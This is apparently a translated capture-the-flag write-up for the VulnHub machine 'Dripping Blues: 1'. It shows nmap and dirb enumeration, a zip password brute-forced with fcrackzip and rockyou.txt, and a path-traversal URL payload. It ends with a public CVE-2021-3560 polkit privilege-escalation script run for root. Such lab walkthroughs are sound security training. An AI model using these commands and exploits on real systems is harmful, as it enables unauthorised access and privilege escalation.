- 英文名称:Dripping Blues: 1
- Chinese name: dripping blues: 1
- Published date: September 19, 2021
- Difficulty: Easy
- Description: About VM: Test and export from VirtualBox. Enable DHCP and nested VTX/AMDV. You can contact me via email for troubleshooting or questions.
- Download: https://www.vulnhub.com/entry/dripping-blues-1,744/
AILX10
Excellent answerer in cybersecurity
Master's in Cybersecurity
Go to consult
1. The IP address is 192.168.199.242
nmap -sP 192.168.199.0/24
Nmap scan report for drippingblues.lan (192.168.199.242) Host discovery
2. Port scanning, ports 21, 22, and 80 were found
nmap -A 192.168.199.242 Port scanning
3. Web access
🔥 Home page
4. Explode the catalog and find clues
└─$ dirb http://192.168.199.242/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Aug 21 14:51:29 2022
URL_BASE: http://192.168.199.242/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.199.242/ ----
+ http://192.168.199.242/index.php (CODE:200|SIZE:138)
+ http://192.168.199.242/robots.txt (CODE:200|SIZE:78)
+ http://192.168.199.242/server-status (CODE:403|SIZE:280)
-----------------
END_TIME: Sun Aug 21 14:51:34 2022
DOWNLOADED: 4612 - FOUND: 3 Catalog blasting
5. Clue prompt to calculate the password of SSH
SSH clue hints
6. Dig the information of the 21 port, you can log in anonymously, find respectmydrip.zip files, and after downloading, you can find that you need a password to open
FTP anonymous login
7. Try to password crack the file, use a 134M codebook here
rockyou.txt密码本
8. Start brute-force attacks
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip
PASSWORD FOUND!!!!: pw == 072528035 Brute-force password cracking
9. Use the password to unpack the archive file to get a hint and another encrypted compression
just focus on "drip" Get the hint and another encrypted archive
10、尝试web访问,得到密码imdrippinbiatch
http://192.168.199.242/index.php?drip=../../../../etc/dripispowerful.html Get a clue
11. According to the prompts on the login page, the username is thugger
Get the username
12. SSH login to get the flag of ordinary users
SSH login is successful
Common user flags
13、寻找提权点,可疑点/usr/lib/policykit-1/polkit-agent-helper-1
thugger@drippingblues:~$ find / -perm -u=s 2>&1 | grep -v "Permission denied"
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign There is a polkit process
14. Exploiting the Polkid Privilege Escalation Loophole[1]
CVE-2021-3560 is an authentication bypass of polkit that allows an unprivileged user to call privileged methods using DBus, in this vulnerability we will call 2 privileged methods provided by accountservice (CreateUser and SetPassword), which will allow us to create a privileged user and then set a password for it, and finally log in as the created user and then escalate to root.
15, SCP 上传POC screenplay
Upload the POC script
16. Run the script, successfully get the root permission, and get the flag
thugger@drippingblues:~$ python3 CVE-2021-3560.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
........ Get root access
At this point, the experiment is complete~
reference
- ^Polkit-exploit https://github.com/Almorabea/Polkit-exploit
Posted on 2022-08-21 16:29